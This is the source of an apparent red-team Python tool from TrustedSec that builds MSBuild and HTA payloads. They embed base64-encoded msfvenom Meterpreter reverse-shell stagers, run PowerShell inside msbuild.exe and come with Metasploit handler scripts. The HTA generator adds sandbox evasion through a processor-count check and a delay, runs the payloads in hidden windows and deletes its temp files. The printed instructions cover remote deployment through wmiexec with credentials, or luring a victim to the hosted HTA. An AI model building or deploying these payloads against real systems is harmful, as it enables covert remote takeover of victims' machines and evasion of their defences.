  1. #!/usr/bin/env python
  2.  
  3. # Written by Larry Spohn (@Spoonman1091)
  4. # Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
  5. # TrustedSec, LLC
  6. # https://www.trustedsec.com
  7.  
  8. from __future__ import print_function
  9. import os
  10. import sys
  11. import netifaces as nic
  12. import pexpect
  13. import base64
  14.  
class bcolors:
  """ANSI SGR escape sequences used to colour the console output.

  Every value is ESC (0x1b) followed by a CSI parameter; ENDC resets all
  attributes. Callers concatenate these around a piece of text and must
  close with ENDC, otherwise the terminal keeps the attribute.
  """
  BLUE = '\x1b[94m'
  GREEN = '\x1b[92m'
  WARNING = '\x1b[93m'
  WHITE = '\x1b[97m'
  ERROR = '\x1b[91m'
  ENDC = '\x1b[0m'
  BOLD = '\x1b[1m'
  UNDERLINE = '\x1b[4m'
  24.  
# Listener address written into the handler / stager. "127.0.0.1" is the
# sentinel for "not chosen yet": generate_msfvenom_payload prompts for the
# address the first time it runs and caches the answer in this global.
listener_ip = "127.0.0.1"

# Interface whose IPv4 address is offered as the default listener IP.
# Adjust to the attacking host's interface name (e.g. eth0, tun0).
local_interface = "ens33"

# Python 2/3 shim: menu input is read with raw_input(), which Python 3 no
# longer has (its input() returns text, as raw_input() did on Python 2).
if sys.version_info[0] >= 3:
  raw_input = input
  34.  
  35. # Enumerate the local IP assigned to "iface"
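def get_local_ip(iface):
  """Return the first IPv4 address bound to interface `iface`, or None.

  None is returned when the interface name is unknown to netifaces or the
  interface carries no IPv4 address. The caller (generate_msfvenom_payload)
  only uses the value as the default offered in the listener-IP prompt, so
  None simply means the operator has to type the address by hand.
  """
  try:
    addresses = nic.ifaddresses(iface)
  except ValueError:
    # netifaces raises ValueError for an interface name that does not exist.
    return None
  # The original indexed the raw family number 2; nic.AF_INET is the same
  # key spelled by name. It is absent when the interface has no IPv4 address.
  inet = addresses.get(nic.AF_INET, [])
  if not inet:
    return None
  return inet[0].get('addr')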
  43.  
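def generate_msfvenom_payload(msf_payload):
  """Build a PowerShell (psh) stager with msfvenom and append its handler to msbuild_nps.rc.

  Prompts for the listener address (only once; cached in the module global
  listener_ip) and the listener port. The stager is written to
  msf_payload.ps1 in the current directory; the caller base64-encodes it.

  The payload is generated with --arch x86, so the deployment instructions
  printed later point at the 32-bit Framework\\ msbuild.exe rather than
  Framework64\\.

  Args:
    msf_payload: Metasploit payload name, e.g. "windows/meterpreter/reverse_tcp".

  Raises:
    RuntimeError: msfvenom exited non-zero (or was killed); previously the
      caller went on to open msf_payload.ps1 and crashed on a missing file.
  """
  global listener_ip

  if listener_ip == "127.0.0.1":
    local_ip = get_local_ip(local_interface)
    # Keep asking until we have something: if auto-detection failed and the
    # operator just hits Enter, LHOST would otherwise become the text "None".
    while True:
      entered = raw_input("Enter Your Local IP Address (%s): " % local_ip) or local_ip
      if entered:
        listener_ip = entered
        break
      print(bcolors.ERROR + "[!]" + bcolors.ENDC + " No IPv4 address found on %s; enter the listener IP explicitly." % local_interface)

  # Validate the port before it is spliced into the msfvenom command line
  # and the resource script.
  while True:
    answer = raw_input("Enter the listener port (443): ") or 443
    try:
      msf_port = int(answer)
    except (TypeError, ValueError):
      msf_port = 0
    if 1 <= msf_port <= 65535:
      break
    print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Port must be an integer between 1 and 65535.")

  # Generate PSH payload
  print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
  command = "msfvenom -p %s LHOST=%s LPORT=%s --arch x86 --platform win -f psh -o msf_payload.ps1" % (msf_payload, listener_ip, msf_port)
  # pexpect.run does not go through a shell. timeout=None: the default 30 s
  # would close the child (killing msfvenom mid-generation) and hand back a
  # partial output; withexitstatus lets us notice a failed run at all.
  output, status = pexpect.run(command, timeout=None, withexitstatus=True)
  if status != 0:
    if isinstance(output, bytes):
      output = output.decode('utf-8', 'replace')
    raise RuntimeError("msfvenom failed (exit status %s):\n%s" % (status, output))

  # Append the handler for this payload to the resource script the caller
  # already initialised with "use multi/handler".
  print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
  payload_listener = "\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z" % (msf_payload, listener_ip, msf_port)
  with open("msbuild_nps.rc", "a") as msf_resource_file:
    msf_resource_file.write(payload_listener)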
  64.  
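def encode_pshpayload(payload_file):
  """Read a PowerShell script and return it base64-encoded for the NPS C# task.

  An endless `for (;;){ Start-sleep 60 }` loop is appended so the script
  (and therefore the msbuild.exe process hosting the runspace) stays
  resident after the stager has run. A newline is inserted first when the
  file does not end with one; previously the loop was glued onto the last
  line of the script.

  The result is always text (str), on Python 2 and 3 alike: base64.b64encode
  returns bytes on Python 3, and formatting bytes into the XML/HTA templates
  with %s would embed "b'...'" in the C# `cmd` string, which Base64Decode
  then rejects. The module global psh_payload is set to the same value as a
  side effect because other parts of the script read it.

  Args:
    payload_file: path of the .ps1 file to embed.

  Raises:
    IOError: the file cannot be read.
  """
  global psh_payload

  with open(payload_file, "r") as psh_file:
    script = psh_file.read()
  if not script.endswith("\n"):
    script += "\n"
  script += "for (;;){\n  Start-sleep 60\n}"

  encoded = base64.b64encode(script.encode('utf-8'))
  psh_payload = encoded.decode('ascii')
  return psh_payload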
  73.  
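def generate_msbuild_nps_msf_payload():
  """Interactive menu: write msbuild_nps.xml (one embedded payload) and msbuild_nps.rc.

  msbuild_nps.xml is an MSBuild project whose inline C# task (Casey Smith's
  MSBuild technique, wrapped by Ben Ten's NPS) creates a PowerShell runspace
  through System.Management.Automation inside msbuild.exe and invokes the
  base64 script stored in `cmd` - no powershell.exe is spawned. Script
  output and any exception message are written to the console.
  msbuild_nps.rc starts a matching multi/handler.

  Both files are written to the current directory. On success the process
  exits (sys.exit(0)) after printing the deployment steps; on an invalid
  selection or an unreadable custom file it returns to the caller's menu
  instead of writing a broken project.
  """
  # Start a fresh resource script; generate_msfvenom_payload appends the
  # handler settings for the chosen payload.
  with open("msbuild_nps.rc", "w") as msf_resource_file:
    msf_resource_file.write("use multi/handler")

  # Display options to the user
  print("\nPayload Selection:")
  print("\n\t(1)\twindows/meterpreter/reverse_tcp")
  print("\t(2)\twindows/meterpreter/reverse_http")
  print("\t(3)\twindows/meterpreter/reverse_https")
  print("\t(4)\tCustom PS1 Payload")

  options = {1: "windows/meterpreter/reverse_tcp",
             2: "windows/meterpreter/reverse_http",
             3: "windows/meterpreter/reverse_https",
             4: "custom_ps1_payload"
  }

  # Read the choice as text and convert it ourselves: the builtin input()
  # eval()s whatever is typed on Python 2, and on Python 3 it returns a str
  # that never matches the int keys above (so every choice fell through to
  # msfvenom with "-p None").
  try:
    choice = int(raw_input("\nSelect payload: "))
  except ValueError:
    choice = None
  selection = options.get(choice)
  if selection is None:
    print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Invalid payload selection.")
    return

  # Generate payload
  if selection == "custom_ps1_payload":
    custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
    try:
      encoded = encode_pshpayload(custom_ps1)
    except IOError as exc:
      print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Could not read %s: %s" % (custom_ps1, exc))
      return
  else:
    generate_msfvenom_payload(selection)
    encoded = encode_pshpayload("msf_payload.ps1")
  # base64.b64encode returns bytes on Python 3; the template needs text or
  # "b'...'" ends up inside the C# string and Base64Decode throws.
  if isinstance(encoded, bytes):
    encoded = encoded.decode('ascii')

  # Create msbuild_nps.xml
  with open("msbuild_nps.xml", "w") as msbuild_nps_file:
    msbuild_nps_file.write("""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
  <!-- License: BSD 3-Clause -->
  <Target Name="npscsharp">
   <nps />
  </Target>
  <UsingTask
    TaskName="nps"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
  <Task>
    <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
      using System.Collections.ObjectModel;
      using System.Management.Automation;
      using System.Management.Automation.Runspaces;
      using Microsoft.Build.Framework;
      using Microsoft.Build.Utilities;
      public class nps : Task, ITask
        {
            public override bool Execute()
            {
              string cmd = "%s";
                PowerShell ps = PowerShell.Create();
                ps.AddScript(Base64Decode(cmd));
                Collection<PSObject> output = null;
                try
                {
                    output = ps.Invoke();
                }
                catch(Exception e)
                {
                    Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
                }
                if (output != null)
                {
                    foreach (PSObject rtnItem in output)
                    {
                        Console.WriteLine(rtnItem.ToString());
                    }
                }
                return true;
            }
            public static string Base64Encode(string text) {
           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
        }
        public static string Base64Decode(string encodedtext) {
            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
        }
        }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>""" % encoded)

  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
  print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
  print("  a. Local File Deployment:\n" + bcolors.WHITE + "    - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
  print("  b. Remote File Deployment:\n" + bcolors.WHITE + "    - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
  print("3. Hack the Planet!!")

  sys.exit(0)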
  186.  
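def generate_msbuild_nps_msf_hta_payload():
  """Interactive menu: write msbuild_nps.hta (several embedded payloads) and msbuild_nps.rc.

  The generated HTA's VBScript does the following, in order:
    * `On Error Resume Next` - every runtime error is silently skipped;
    * reads NumberOfLogicalProcessors over WMI and only continues when it is
      above 1, then sleeps ~60 s via `ping -n 60 127.0.0.1` (sandbox /
      virtualisation evasion; the linked TrustedSec and SANS articles give
      the rationale);
    * for each payload writes resource<N>.xml - the NPS MSBuild project,
      same inline C# task as msbuild_nps.xml - into %TEMP% and launches it
      with the 32-bit Framework msbuild.exe, window style 0 (hidden);
    * polls every ~10 s until each resource<N>.xml can be deleted, then
      closes the HTA window.

  Payloads are collected into a VBScript Array() literal. Files go to the
  current directory. Exits the process after printing the deployment steps;
  returns to the caller's menu if no payload was added.
  """
  encoded_payloads = []

  # Start a fresh resource script; generate_msfvenom_payload appends one
  # handler per payload.
  with open("msbuild_nps.rc", "w") as msf_resource_file:
    msf_resource_file.write("use multi/handler")

  while True:
    # Display options to the user
    print("\nPayload Selection:")
    print("\n\t(1)\twindows/meterpreter/reverse_tcp")
    print("\t(2)\twindows/meterpreter/reverse_http")
    print("\t(3)\twindows/meterpreter/reverse_https")
    print("\t(4)\tCustom PS1 Payload")
    print("\t(99)\tFinished")

    options = {1: "windows/meterpreter/reverse_tcp",
               2: "windows/meterpreter/reverse_http",
               3: "windows/meterpreter/reverse_https",
               4: "custom_ps1_payload",
               99: "finished"
    }

    # Read the choice as text and convert it ourselves: the builtin input()
    # eval()s the typed text on Python 2 and returns a str on Python 3 that
    # never matches the int keys above.
    try:
      choice = int(raw_input("\nSelect multiple payloads. Enter 99 when finished: "))
    except ValueError:
      choice = None
    selection = options.get(choice)
    if selection is None:
      print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Invalid payload selection.")
      continue
    if selection == "finished":
      break

    # Generate payloads
    if selection == "custom_ps1_payload":
      custom_ps1 = raw_input("Enter the location of your custom PS1 file: ")
      try:
        encoded = encode_pshpayload(custom_ps1)
      except IOError as exc:
        print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Could not read %s: %s" % (custom_ps1, exc))
        continue
    else:
      generate_msfvenom_payload(selection)
      encoded = encode_pshpayload("msf_payload.ps1")
      # The stager is embedded now; do not leave the cleartext copy on disk.
      os.remove("msf_payload.ps1")
    # base64.b64encode returns bytes on Python 3; the VBScript needs text.
    if isinstance(encoded, bytes):
      encoded = encoded.decode('ascii')
    encoded_payloads.append(encoded)

  if not encoded_payloads:
    print(bcolors.WARNING + "[!]" + bcolors.ENDC + " No payloads selected; msbuild_nps.hta not written.")
    return

  # VBScript Array() literal: each payload double-quoted, items separated
  # by a line continuation so the generated script stays readable.
  psh_payloads = ", _\n\t".join('"' + payload + '"' for payload in encoded_payloads)

  # Create msbuild_nps.hta
  with open("msbuild_nps.hta", "w") as msbuild_nps_file:
    msbuild_nps_file.write("""<script language=vbscript>
  On Error Resume Next
  Set objFSO = CreateObject("Scripting.FileSystemObject")
  Set objShell = CreateObject("WScript.Shell")
  objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
  objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
  Set objWMIService = GetObject("winmgmts:\\\\.\\root\CIMV2")
  arrUnicorns = Array(%s)
  ' Get logical processor count
  Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
  For Each objComputerSystem In colComputerSystem
    objProcessorCount = objComputerSystem.NumberofLogicalProcessors
  Next
  ' Only run if system has more than 1 processor
  ' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
  If objProcessorCount > 1 Then
    ' Sleep 60 seconds
    ' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
    objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1
    For Each objUnicorn in arrUnicorns
      x = x + 1
      ' Create MSBuild XML File
      CreateMSBuildXML objUnicorn, x
      ' Execute resource(x).xml using msbuild.exe and nps
      objShell.Run objWindir & "\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
    Next
    ' Cleanup
    For y = 1 To x
      Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
        objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
        objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
      Loop
    Next
  End If
  window.close()
  ' Creates XML configuration files in the %%TEMP%% directory
  Function CreateMSBuildXML(objUnicorn, x)
    msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
    "  <!-- This inline task executes c# code. -->" & vbCrLf &_
    "  <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->" & vbCrLf &_
    "  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
    "  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
    "  <!-- License: BSD 3-Clause -->" & vbCrLf &_
    "  <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
    "   <nps />" & vbCrLf &_
    "  </Target>" & vbCrLf &_
    "  <UsingTask" & vbCrLf &_
    "    TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
    "    TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
    "    AssemblyFile=" & CHR(34) & "C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
    "  <Task>" & vbCrLf &_
    "    <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
    "      <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
    "        <![CDATA[" & vbCrLf &_
    "" & vbCrLf &_
    "          using System;" & vbCrLf &_
    "      using System.Collections.ObjectModel;" & vbCrLf &_
    "      using System.Management.Automation;" & vbCrLf &_
    "      using System.Management.Automation.Runspaces;" & vbCrLf &_
    "      using Microsoft.Build.Framework;" & vbCrLf &_
    "      using Microsoft.Build.Utilities;" & vbCrLf &_
    "" & vbCrLf &_
    "      public class nps : Task, ITask" & vbCrLf &_
    "        {" & vbCrLf &_
    "            public override bool Execute()" & vbCrLf &_
    "            {" & vbCrLf &_
    "              string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
    "              " & vbCrLf &_
    "                PowerShell ps = PowerShell.Create();" & vbCrLf &_
    "                ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
    "" & vbCrLf &_
    "                Collection<PSObject> output = null;" & vbCrLf &_
    "                try" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    output = ps.Invoke();" & vbCrLf &_
    "                }" & vbCrLf &_
    "                catch(Exception e)" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
    "                }" & vbCrLf &_
    "                if (output != null)" & vbCrLf &_
    "                {" & vbCrLf &_
    "                    foreach (PSObject rtnItem in output)" & vbCrLf &_
    "                    {" & vbCrLf &_
    "                        Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
    "                    }" & vbCrLf &_
    "                }" & vbCrLf &_
    "                return true;" & vbCrLf &_
    "            }" & vbCrLf &_
    "" & vbCrLf &_
    "            public static string Base64Encode(string text) {" & vbCrLf &_
    "           return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
    "        }" & vbCrLf &_
    "" & vbCrLf &_
    "        public static string Base64Decode(string encodedtext) {" & vbCrLf &_
    "            return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
    "        }" & vbCrLf &_
    "        }" & vbCrLf &_
    "        ]]>" & vbCrLf &_
    "      </Code>" & vbCrLf &_
    "    </Task>" & vbCrLf &_
    "  </UsingTask>" & vbCrLf &_
    "</Project>"
    Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
    objFile.WriteLine(msbuildXML)
    objFile.Close
  End Function
</script>""" % psh_payloads)

  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
  print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
  print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
  print("2. Deploy hta file to web server and navigate from the victim machine.")
  print("3. Hack the Planet!!")

  sys.exit()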
  362.  
  363. # Exit Program
def quit():
  """Terminate the program with exit status 0 (menu option 99)."""
  # sys.exit(0) is exactly this exception; raising it directly keeps the
  # module-level `sys` import out of the call.
  raise SystemExit(0)
  366.  
  367.  
  368. # Main guts
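def main():
  """Print the banner and run the top-level task menu.

  Loops until a task terminates the process: both generators call sys.exit
  once they have written their files, and option 99 calls quit(). Unknown
  or non-numeric choices redisplay the menu.
  """
  print("""
                                     (            (
                              ) (    )\        )  )\ )
  (    `  )  (       `  )  ( /( )\ )((_)(   ( /( (()/(
  )\ ) /(/(  )\      /(/(  )(_)|()/( _  )\  )(_)) ((_)
 _(_/(((_)_\((_)    ((_)_\((_)_ )(_)) |((_)((_)_  _| |
| ' \)) '_ \|_-<    | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
      |_|     |_____|_|         |__/
                       v1.03
""")

  tasks = {1: generate_msbuild_nps_msf_payload,
           2: generate_msbuild_nps_msf_hta_payload,
           99: quit,
  }

  while True:
    # Display options to the user
    print("\n\t(1)\tGenerate msbuild/nps/msf payload")
    print("\t(2)\tGenerate msbuild/nps/msf HTA payload")
    print("\t(99)\tQuit")

    # Read the choice as text and convert it ourselves: the builtin input()
    # eval()s the typed text on Python 2 (arbitrary code from stdin), and on
    # Python 3 it returns a str that never matches the int keys above.
    try:
      task = int(raw_input("\nSelect a task: "))
    except ValueError:
      continue
    handler = tasks.get(task)
    if handler is not None:
      handler()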
  397.  
  398.  
  399. # Standard boilerplate to call the main() function
if __name__ == "__main__":
  # Run the interactive menu only when executed as a script, not on import.
  main()